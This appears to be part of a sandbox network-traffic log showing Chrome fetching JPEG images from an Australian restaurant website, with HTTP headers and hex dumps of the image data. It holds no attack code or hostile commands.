                                                                                                                                                    2024-10-01 04:26:32 UTC16384INData Raw: c4 9a e3 be a1 10 f3 73 39 49 06 19 a8 de 00 ed be 56 e7 c4 8a 11 c7 2a 55 37 4e ea f5 b9 4c 46 89 c1 39 51 9a b2 f1 e4 20 e1 fc 72 f2 f3 ed 34 23 c3 25 dc e7 07 85 71 9a 08 94 74 2d ba 39 f7 52 02 89 a1 48 d9 af 15 4d a2 58 15 06 4a 04 62 25 ce a0 5a 81 e0 df 53 8b 5e 0c 4e 34 27 62 76 39 1c 23 f3 fd 85 6b a8 c6 1e 37 4a 8f b5 1a fd 51 0f 32 86 bf 34 a0 06 2d 5e 45 e3 00 a3 d2 ba ae 58 d7 d5 03 a2 8d 54 d1 74 14 7b e0 b8 97 41 aa 65 d1 00 cc d4 0e 73 34 1b b0 88 a1 34 be 25 44 45 ef 26 13 0e cc 59 6a 09 3e 01 30 86 5a 36 43 02 90 4c 91 0c 48 ae a1 48 0c b2 54 7d 89 5c e4 ba 72 90 9b 4e ac 81 7c 64 24 00 55 3f 91 ac 72 5c cd 99 fe 00 65 c2 94 2a 73 91 a1 99 9d a6 9c 12 98 6d 90 45 a9 c7 eb 7d f3 7f c6 cc ed d9 9e ed d9 9e ed d9 fe ca 80 62 d5 32 ac 8c 08
                                                                                                                                                    Data Ascii: s9IV*U7NLF9Q r4#%qt-9RHMXJb%ZS^N4'bv9#k7JQ24-^EXTt{Aes44%DE&Yj>0Z6CLHHT}\rN|d$U?r\e*smE}b2
                                                                                                                                                    2024-10-01 04:26:32 UTC15252INData Raw: 5b 47 d6 07 80 a9 51 10 fc bc f4 63 1a 9d 9b 41 d0 e2 d7 bf 98 01 d3 84 d3 e9 84 97 69 06 33 41 8b 40 45 37 53 8b 53 06 53 46 9e 27 9c 4e 13 4e af 1f f0 f2 f2 82 d3 6b 30 66 a7 93 8f db d0 7e b1 a9 00 79 02 4d 33 a6 52 60 7a c1 d7 af 5f 5b 09 34 91 91 6f 74 7d 63 56 4d 5d fa c0 b7 cf a6 27 e4 ab e0 90 ba 2b 3e 00 4f ea 1a 7c d6 69 cd 64 f3 b2 2d 0d e7 ed 52 1c 54 53 73 c7 d2 a6 45 c5 75 5c 49 2d 69 76 4d 29 49 ed ba 12 05 ef 87 c8 9d 4e 01 a4 8f 13 d6 45 f0 19 6f ce e2 4c 0c f6 73 32 00 b4 9c 2f a3 09 04 8a 1b b2 00 6e 8c 53 c7 75 dc 0f aa 01 3a a9 03 26 45 25 74 bc 6a 49 d4 36 d4 6b ff 55 bd d1 7a 1f f6 fa 96 d3 34 03 20 ac 4b 01 8c 90 d2 64 66 44 55 d7 b1 06 24 2f 2f 2f 10 59 7d 8c 6a 41 29 0b 00 85 65 97 55 77 76 54 00 16 56 81 08 80 99 ad 19 55 04 45
                                                                                                                                                    Data Ascii: [GQcAi3A@E7SSSF'NNk0f~yM3R`z_[4ot}cVM]'+>O|id-RTSsEu\I-ivM)INEoLs2/nSu:&E%tjI6kUz4 KdfDU$///Y}jA)eUwvTVUE
                                                                                                                                                    2024-10-01 04:26:32 UTC16384INData Raw: f7 bb 1b 00 23 64 b8 1c 02 55 3d 45 75 26 79 6f 1c 25 e1 64 2f 50 14 75 e6 ba 68 82 52 86 80 51 68 45 11 83 5f 6e 02 68 02 25 60 9e 52 03 22 dd 84 4b 01 ae fd e4 ac 77 bf 7f 3c a9 06 84 c1 55 53 08 f3 f1 57 a4 58 59 8d 4a b8 6a d7 18 df b8 2b dd 85 97 fb 1a f1 60 80 16 1a 6e 9e 00 0b a9 0a ad f7 a9 6e e3 25 a5 54 2b 0a ac ae 2f 3d c3 b5 6a 0e 0e ba 66 d8 ca fd c9 5c 87 b6 8d f5 7a 3d 14 87 f7 d6 2d 10 ba ff 59 13 96 b7 5a 73 c6 1e 3e 9b 06 03 9c 1e 0c ee fb 85 88 c0 99 87 fb c1 35 82 43 ff f7 46 6e 79 90 3c 31 ab e4 63 54 06 b5 6e 97 ae 49 ac c0 fd d3 b6 4a 98 0d 70 09 74 a7 3b f0 0e 2a 88 e3 3d 2a 59 8e ec f7 90 ec 50 ec cc 25 02 b8 b2 6a b6 66 4c c4 cc ed 75 ad ff 86 cb d3 ad a3 54 cb 92 d9 3a 73 3c 9b e7 d9 72 ce 5e e9 32 cf 78 79 79 c1 e9 74 02 52 ac
                                                                                                                                                    Data Ascii: #dU=Eu&yo%d/PuhRQhE_nh%`R"Kw<USWXYJj+`nn%T+/=jf\z=-YZs>5CFny<1cTnIJpt;*=*YP%jfLuT:s<r^2xyytR
                                                                                                                                                    2024-10-01 04:26:32 UTC16384INData Raw: 0a a8 f9 dc 00 93 71 62 e2 e6 42 1b e3 aa b9 73 1a 1c a0 ca 96 1a 70 61 cd c0 63 34 3f 79 64 6a b3 36 fe 46 57 f3 83 01 b7 39 27 ec e0 da d1 d4 c5 e8 1e b0 d4 81 d3 91 51 13 e3 82 d4 01 7c 67 50 d4 f5 8e 0f f7 17 61 68 90 b3 1b 71 10 af 00 da 3d c0 eb 11 b8 a8 0f fa e6 5e 39 ff dd e0 5d a9 83 19 aa ce 14 42 55 98 55 a8 1a ae 97 57 88 ad eb 48 03 12 29 be 2e cb b2 03 14 1b fb ac 00 4b 85 90 b9 ae d3 75 b1 7a b9 d2 f2 fa 82 7a 3e 43 2f 17 d8 5c 30 cf 97 60 36 17 54 ab 50 5d 7c ae b7 7e 6e 26 35 50 68 30 b9 b4 b9 f4 c2 dc f5 56 9c 8d e1 ba 51 ce be 01 87 db 73 1c 2e 78 00 b6 5b 9f 26 73 40 88 cd d9 b8 b2 a2 6e c3 81 34 fa 4d 47 e0 cb cb 5e 47 46 2c c3 06 ed 06 43 ac 58 a8 f3 75 e3 fa b8 07 14 29 34 98 9a 5b fd 0c 01 f3 e4 92 13 c8 f4 bb 7f fa 03 98 32 38 2d
                                                                                                                                                    Data Ascii: qbBspac4?ydj6FW9'Q|gPahq=^9]BUUWH).Kuzz>C/\0`6TP]|~n&5Ph0VQs.x[&s@n4MG^GF,CXu)4[28-
                                                                                                                                                    2024-10-01 04:26:32 UTC16384INData Raw: 3c e4 8c 9c 92 07 a9 c4 ee 64 38 a4 70 cf e7 33 58 0d a7 c3 11 fc a4 b0 b9 e0 b2 7c c5 f5 f5 8c f3 f9 8c 5f fe f2 67 00 c0 24 ec ac 38 33 63 8b ea 8c 5a 20 6f 83 40 46 64 61 0a 5a dd 35 db b8 b9 1d fa ee cb e4 fd b0 14 94 2b 90 84 a0 e2 79 4a 4a 86 03 fb 21 51 cc 05 9b 8d 14 8b 29 a8 2a 50 2b d2 02 d8 02 e8 ac d0 b9 82 96 28 5d 83 bb 07 46 f1 6c df e3 a9 01 08 d5 1a cd 09 a8 0a d2 70 73 8c 93 7d 03 2a 38 8c 4f c6 92 c8 11 24 1a 85 a1 5b a6 7b d0 f7 21 92 e8 ef ce 04 09 66 46 59 dc 58 02 cd 55 d2 d9 38 f3 e2 a5 e5 ce 1a 48 51 8a 5a 00 ad 26 4c 74 3a 4c 38 1d 26 07 58 ad 42 98 50 8b 9b 44 10 14 87 2c a0 c3 84 5a 33 e6 7a c5 a5 54 08 31 8e d3 c1 e5 88 aa 97 dd 8b a3 ae 58 ca e2 07 f1 c9 0d 0f 8a 05 90 94 04 53 9a f0 97 b9 c0 cc 41 0a 4e 82 e9 30 e1 74 3c 61
                                                                                                                                                    Data Ascii: <d8p3X|_g$83cZ o@FdaZ5+yJJ!Q)*P+(]Flps}*8O$[{!fFYXU8HQZ&Lt:L8&XBPD,Z3zT1XSAN0t<a
                                                                                                                                                    2024-10-01 04:26:32 UTC16336INData Raw: 67 7c f7 11 b5 0e 37 82 e7 e5 57 f4 83 84 9f 36 c6 66 b3 94 bf e6 3c ad 1e 6c ae 01 c4 83 d2 b3 c3 29 fd c0 82 91 e2 88 e4 4d 70 85 11 41 10 f3 6d f7 02 f5 35 cf 71 8f b1 43 16 ac 3d 52 f4 2d 83 bc c3 d9 00 92 48 6e 8f cb 18 8d 30 1b 63 28 d3 7b 89 51 58 50 a5 40 ca d8 a8 ba b3 3a a9 70 00 84 e4 6e a6 04 57 90 85 ef a4 80 82 b5 48 04 82 44 73 86 08 0a f2 35 37 ed 37 18 ba 03 cd 80 9b 1a 16 03 56 87 eb 16 cf fa b1 a6 4f 39 98 76 25 f2 35 02 30 b3 e4 56 b2 13 59 18 2e 92 1b 5c 1d a6 86 75 55 f4 db 82 25 41 7c 66 46 9f 5e 71 bd 7c f1 fb 4f 5f e9 e9 e9 09 97 eb 15 cf cf 3f 43 be 7e 81 58 8b d4 d2 7a 81 cd 13 4a bb 02 a5 10 d2 da c5 dd 81 9b c2 6f 0b f9 ed 57 f8 eb 37 e8 cb 9f e0 6f bf 00 cb 2b 78 bd 81 f5 96 2c bd 00 1d dc 76 ff 61 a2 f8 dc a7 05 75 ff 1a a0
                                                                                                                                                    Data Ascii: g|7W6f<l)MpAm5qC=R-Hn0c({QXP@:pnWHDs577VO9v%50VY.\uU%A|fF^q|O_?C~XzJoW7o+x,vau
                                                                                                                                                    2024-10-01 04:26:32 UTC48INData Raw: a7 a7 a7 58 b3 26 d9 52 ea 99 99 40 71 1e 7d 69 a0 6a b0 d2 c0 06 b0 db 16 4b 7d 9a af 8f fe a4 87 fb fc c8 12 8a 8d dc ee e7 38 98 f4 aa 8a ae
                                                                                                                                                    Data Ascii: X&R@q}ijK}8
                                                                                                                                                    2024-10-01 04:26:32 UTC16384INData Raw: 2d fd 4c ed b4 ee 95 4c 41 37 fb d8 0f 70 cc 37 cc 78 ef 83 77 bc 2e f4 a3 b9 36 53 bd 7d 5f 93 de ad 83 ef bd 4e 0f f3 fc 03 63 f1 90 aa fc 6e b3 99 58 cd f8 f9 c7 73 0f 3d 78 fd 1e de 6b 9e 1f 1f c4 30 e2 ef 7e ae c7 b9 99 52 72 7d 7c 5e ca f0 26 7a ac 6d b0 7f 7d 64 0d 7e e4 27 f6 37 3e b6 17 8b b4 f6 e8 cf 18 85 05 41 74 4d ce e3 b8 30 63 92 8a cb cc b8 a6 34 f9 49 26 cc 65 c1 2c 15 75 9a 50 4b 8d d6 a2 5a b2 72 2d 24 e1 ef d6 9c fd 73 cd 73 30 83 6b 6e fe 7b ef 60 12 a7 5a 69 9a a6 13 53 76 9a 26 b0 cf a8 a6 94 5e a7 20 2a 28 a5 78 29 05 28 05 9e b5 e1 60 b6 59 b2 ed b6 b9 95 e1 84 7d 5e 6f ad b9 5a c8 5c 55 d5 ec 60 89 11 ef 6f 06 11 b9 cb e4 84 02 e3 0a 37 0e 59 bf 31 7e fd f6 36 c0 a7 98 1f d8 fd 70 af 0e a6 e1 23 f3 8c dc 47 34 4d b8 cb 8c cc 64
                                                                                                                                                    Data Ascii: -LLA7p7xw.6S}_NcnXs=xk0~Rr}|^&zm}d~'7>AtM0c4I&e,uPKZr-$ss0kn{`ZiSv&^ *(x)(`Y}^oZ\U`o7Y1~6p#G4Md


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    43192.168.2.449792162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:32 UTC389OUTGET /assets/imgs/featured-image-02.jpg HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:32 UTC353INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:32 GMT
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:05:18 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 45010
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:32 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:32 UTC16031INData Raw: ff d8 ff e1 28 d6 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 02 a6 00 00 01 01 00 03 00 00 00 01 01 c4 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d6 87 69 00 04 00 00 00 01 00 00 00 ec 00 00 01 24 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 30 37 3a 32 36 20 32 31 3a 34 30 3a 31 31 00 00 00 00 04 90 00 00 07 00
                                                                                                                                                    Data Ascii: (ExifMM*(1"2i$''Adobe Photoshop CC 2015 (Windows)2022:07:26 21:40:11
                                                                                                                                                    2024-10-01 04:26:32 UTC16384INData Raw: b4 be 8a 9c ed db 6b ef 07 df bb fa ea 1d 37 ea de 1b 7a 73 f1 b3 08 b1 83 5a e7 43 b7 f3 53 f4 f1 d4 b1 e9 f4 b1 2d 2c 64 c3 26 63 fa d0 a4 f6 89 9c 27 90 71 c6 31 20 43 6a 3d da a7 2c 04 65 ed 13 19 71 59 94 ba 8f 07 5d fd 3f 0f a3 54 0b 5a e7 30 e9 20 4b be 21 70 bf 5a c6 76 71 39 5d 2f 1e eb 31 9b ab df 5b 4c 00 3f 3b 6e 8b af 7e 17 52 bd 9b 5f 78 b6 d7 18 75 b6 02 40 f8 06 9f 6a b7 ba dc 37 37 12 e6 31 ed 7c 90 e6 82 38 fc dd a5 4c 6e 5a 70 70 42 24 55 8e ac 23 21 87 a8 4b 8a 66 c1 b7 c9 ba 7e 76 45 64 5f 66 35 d7 37 80 ef 4d e4 7f 9d b5 43 aa 75 a7 e6 3a 18 c1 50 1a 10 04 1f c5 7a 7f 50 eb 39 38 56 50 2d e9 97 7d 8d e4 33 ed 72 3d 36 93 fb cd 04 ba b5 cf fd 66 e9 38 3d 4b 2d 9f 66 af 7e 65 c3 db 5d 60 17 11 ce e7 c7 fe 7c 7a 13 8e 38 ec 2e 43 53 1e
                                                                                                                                                    Data Ascii: k7zsZCS-,d&c'q1 Cj=,eqY]?TZ0 K!pZvq9]/1[L?;n~R_xu@j771|8LnZppB$U#!Kf~vEd_f57MCu:PzP98VP-}3r=6f8=K-f~e]`|z8.CS
                                                                                                                                                    2024-10-01 04:26:32 UTC12595INData Raw: 8b 16 12 e4 d8 67 fd 7b d3 b0 b2 b6 1c ed f5 b4 6a 46 e3 87 3f d8 dc 61 4b 95 5b 59 5e 03 6b d7 3a fd b2 dd d5 d7 af 53 60 4e fb 74 5b e7 6b 2a a1 ba e7 ae 90 da 23 da dc 62 ac 16 82 77 13 49 9d a3 49 b1 b3 56 98 4b a9 4c 65 0b 4d 41 d8 5d 77 b3 68 22 ca bb 2a aa 3c a5 a9 8d 83 a7 45 61 98 3d 32 c5 9b dd 8a a1 6b 36 74 fb 6e ba 80 d4 ee 5a 9b f5 b6 4d 6e db 34 7a 66 a6 b6 c3 5e 9a f5 db d6 f4 ef a9 4d d7 ab 51 69 3a 18 9e d3 5d 4f bf b9 b1 66 fe af 79 6d a6 36 2a bb 09 8e 1b c8 d2 5c 4b bb 26 81 fa ab 7f a3 76 01 45 7a 88 df 38 08 4c 9c 3a e4 ed 54 3b 6a 4c a5 52 ae e7 5f 63 6b 5d d4 ed a5 89 f3 2d ae ba 8d 94 27 56 ed 7a 09 4b 39 27 59 89 9a c5 e0 4b 99 99 74 8a f7 5b 7f 88 aa f2 ab d5 f5 1a 25 0d ab 1b 4d 9d 5b 43 b2 b3 68 d1 bc fd 91 5e a8 60 ed 1a 51
                                                                                                                                                    Data Ascii: g{jF?aK[Y^k:S`Nt[k*#bwIIVKLeMA]wh"*<Ea=2k6tnZMn4zf^MQi:]Ofym6*\K&vEz8L:T;jLR_ck]-'VzK9'YKt[%M[Ch^`Q


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    44192.168.2.449793162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:32 UTC389OUTGET /assets/imgs/featured-image-01.jpg HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:32 UTC353INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:32 GMT
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 23:53:10 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 54948
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:32 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:32 UTC16031INData Raw: ff d8 ff e1 28 39 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 11 01 00 00 03 00 00 00 01 17 70 00 00 01 01 00 03 00 00 00 01 0f a0 00 00 01 02 00 03 00 00 00 03 00 00 00 da 01 06 00 03 00 00 00 01 00 02 00 00 01 0f 00 02 00 00 00 06 00 00 00 e0 01 10 00 02 00 00 00 12 00 00 00 e6 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 f8 01 1b 00 05 00 00 00 01 00 00 01 00 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 01 08 01 32 00 02 00 00 00 14 00 00 01 2a 02 13 00 03 00 00 00 01 00 02 00 00 9c 9d 00 01 00 00 00 02 00 00 00 00 87 69 00 04 00 00 00 01 00 00 01 40 88 25 00 04 00 00 00 01 00 00 05 2c 00 00 05 40 00 08 00 08 00 08 43 61 6e 6f 6e 00 43 61 6e 6f 6e 20 45 4f 53 20 32 30 30
                                                                                                                                                    Data Ascii: (9ExifMM*p(1"2*i@%,@CanonCanon EOS 200
                                                                                                                                                    2024-10-01 04:26:32 UTC16384INData Raw: 52 2d 0c 6f 51 b2 ca c7 1f 68 a8 59 7b 7f e0 fd 57 b2 dd ff 00 fb 13 ef ff 00 83 55 73 ad bf 36 81 98 f2 e7 32 ab 05 0d de ed ce 1b 9a eb f7 1f f8 cf 7f d0 f6 33 f9 b5 d8 75 4f ab 7f 56 ee c7 75 f4 54 ee 98 f7 97 fa 59 1e b1 6e 1b c0 3f 4f 1a 9b 99 97 9f d4 9d ef 67 fc 97 8f f6 4f fb b7 52 cb cc e8 98 5d 2d b8 d8 d9 47 2d d8 59 39 35 db 7e 45 f4 9c 40 e6 56 7e cc ff 00 b2 37 f5 a7 b7 6d 79 fb df 76 46 cf e6 bd 3f e7 50 11 03 60 92 49 ea f3 34 5f 75 26 6b 31 3c b4 fd 13 fd 60 af d7 94 db 59 b8 08 23 47 37 c0 ae 8f 3b 0b ea 56 29 b1 b4 7e cf be 96 b8 32 bb af cd cb b5 e6 48 1b be cf d3 eb 6e cd b3 ee b3 f4 95 7f e7 b5 4f ab 60 f4 0c 7c 2a fa 9f 4a b5 96 b5 e4 b7 33 17 1a c7 5b 5d 4d dd e9 e3 de 3e d7 fa ed 1e a3 ff 00 d3 fa 9e a7 a9 ff 00 69 ff 00 45 52 54
                                                                                                                                                    Data Ascii: R-oQhY{WUs623uOVuTYn?OgOR]-G-Y95~E@V~7myvF?P`I4_u&k1<`Y#G7;V)~2HnO`|*J3[]M>iERT
                                                                                                                                                    2024-10-01 04:26:32 UTC16384INData Raw: a4 20 b5 ba 7d c2 7b 73 3f 66 25 fd 3d b8 2c 8f 9c e7 0d 33 3c b2 bf 12 69 58 c9 2b 9d ec ee 6a cc 7c e4 e3 9b ae 11 f3 da af 46 00 19 60 20 e0 07 64 a6 01 b6 4c 14 92 b8 04 15 c5 47 29 80 e5 30 0a 00 e0 1d 55 c8 2b 4a 9e a3 bb 00 54 70 09 92 a8 bb 10 d5 94 6d 34 de 76 6f c5 43 8d 75 a5 c5 01 08 dc 59 4f 6a 27 51 d8 a8 e8 60 db 70 53 1f 8e 4d ec af e8 8e f7 f0 62 0f ff d6 ad 3d a5 ba c8 8c c4 33 64 50 59 9b 69 a7 5e 36 c0 98 8d b2 74 a7 a4 8c 14 54 73 da 53 29 64 db e5 c0 75 a4 b6 27 d5 c1 9a 5c 52 5b 03 b9 4e 00 b8 e5 80 f4 01 8a 82 a3 96 00 0b 31 01 40 ab 1e a0 36 9c 11 95 6b da d4 9a 96 a3 25 dc 8d 58 94 95 81 06 e4 88 1d cb e5 6f 59 b1 e9 93 11 15 8d 61 75 4b 69 a3 37 99 ad fe 2a 24 b9 b5 45 ca 4b c1 25 72 49 d3 40 d4 34 5c 72 df 6b 96 e4 47 c3 f1 93
                                                                                                                                                    Data Ascii: }{s?f%=,3<iX+j|F` dLG)0U+JTpm4voCuYOj'Q`pSMb=3dPYi^6tTsS)du'\R[N1@6k%XoYauKi7*$EK%rI@4\rkG
                                                                                                                                                    2024-10-01 04:26:32 UTC6149INData Raw: 48 c3 5b db 22 02 57 37 13 ee e3 ee ae 3d 7a 4f c7 33 b4 c3 c3 cb a6 bc 9b fd b7 3f ed 66 bc e1 cd 74 9b 54 e6 14 bc ae ab 76 1a 6b 89 e2 7e 0a 71 0d 15 a2 8e 2e cc 8d c2 a7 0b eb 77 f1 e4 f7 f7 de 57 af 1e 9a e3 c2 2f 91 6c be 03 96 46 b7 0d 93 3e a5 78 cd c3 25 99 82 c4 5b ee da 5c dd 83 99 b6 c7 1f e7 61 cd 7e ef ac 8c f0 cf b7 e9 ec 9a d0 ec 96 f8 9d 46 e1 e6 9e f2 0c c9 67 71 31 5c 8a c7 bd 2b 50 65 2f 27 bb 55 ee a7 e7 63 86 3a 7f 89 da f7 46 ea 3a cd c7 33 f3 7d 8e 93 c2 86 dc da 2c c6 6b 85 05 14 ac 6b 9a 28 a4 8b 62 82 ae 33 32 a7 6a 5c d9 31 d7 5d 26 ba 7b 6d df 2e 57 6f bb d6 7f 30 5f 11 35 a9 62 d1 95 6e e3 36 f7 57 94 17 d1 aa ad 27 75 00 a4 ca e3 62 9e c8 12 46 31 ae 19 bd da f5 5e 5c 69 19 1d 49 5d a6 be 7c 7d 07 ce 79 0d 7b 27 15 1c 61 43
                                                                                                                                                    Data Ascii: H["W7=zO3?ftTvk~q.wW/lF>x%[\a~Fgq1\+Pe/'Uc:F:3},kk(b32j\1]&{m.Wo0_5bn6W'ubF1^\iI]|}y{'aC


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    45192.168.2.449794162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:32 UTC389OUTGET /assets/imgs/featured-image-04.jpg HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:32 UTC353INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:32 GMT
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 23:51:58 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 46125
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:32 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:32 UTC16031INData Raw: ff d8 ff e1 20 b7 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 11 01 00 00 03 00 00 00 01 17 70 00 00 01 01 00 03 00 00 00 01 0f a0 00 00 01 02 00 03 00 00 00 03 00 00 00 da 01 06 00 03 00 00 00 01 00 02 00 00 01 0f 00 02 00 00 00 06 00 00 00 e0 01 10 00 02 00 00 00 12 00 00 00 e6 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 f8 01 1b 00 05 00 00 00 01 00 00 01 00 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 01 08 01 32 00 02 00 00 00 14 00 00 01 2a 02 13 00 03 00 00 00 01 00 02 00 00 9c 9d 00 01 00 00 00 02 00 00 00 00 87 69 00 04 00 00 00 01 00 00 01 40 88 25 00 04 00 00 00 01 00 00 05 2c 00 00 05 40 00 08 00 08 00 08 43 61 6e 6f 6e 00 43 61 6e 6f 6e 20 45 4f 53 20 32 30 30
                                                                                                                                                    Data Ascii: ExifMM*p(1"2*i@%,@CanonCanon EOS 200
                                                                                                                                                    2024-10-01 04:26:32 UTC5499INData Raw: e8 6f 72 db a7 a4 75 1b 29 07 17 1b 33 3d a7 fc 2e 36 35 c5 ba ff 00 c2 5d 4d 7f e7 2d 86 7d 65 c9 ac 7e a3 76 55 80 81 b8 e3 b9 d4 52 5d 1e e8 c8 b7 d3 77 a7 bb e8 fb 15 3c be a1 d5 73 5d 39 37 c0 3c 07 39 f9 4e ff 00 3f 2d fe 87 f9 8c 4d b0 ba 8b 5b f6 57 50 73 4d 57 33 1f 12 b6 ea 5d 91 78 73 da 7f 97 8f 87 f6 9c 86 3b db f9 d4 ab 1d 2e be 97 8b 91 ba 9c 87 75 0c 86 89 03 1e b7 1a d8 48 db bd 94 d5 ea ba e7 ff 00 a3 b3 2e fc 5a ea ff 00 b8 ef 55 6c c7 0f 70 f5 01 b9 cd d5 a6 e3 bc 02 7f 76 9f 66 33 7f ed 94 73 5d 94 61 d9 75 87 73 2a 61 70 ab 86 e9 fb b4 88 67 fd 04 d9 48 af 8c 47 57 57 f6 c6 55 12 ea 3d 2c 5f 4b 47 5d 91 63 5c e0 7f e2 69 73 eb 6f fd 76 f5 cc 66 d1 8b 93 92 f3 d3 2f 0e 74 6e b2 b6 34 d7 5e f3 26 c1 8a cf f0 75 ff 00 c1 7f 37 fe 89 43
                                                                                                                                                    Data Ascii: oru)3=.65]M-}e~vUR]w<s]97<9N?-M[WPsMW3]xs;.uH.ZUlpvf3s]aus*apgHGWWU=,_KG]c\isovf/tn4^&u7C
                                                                                                                                                    2024-10-01 04:26:32 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 3d 22 77 22 3f 3e ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00
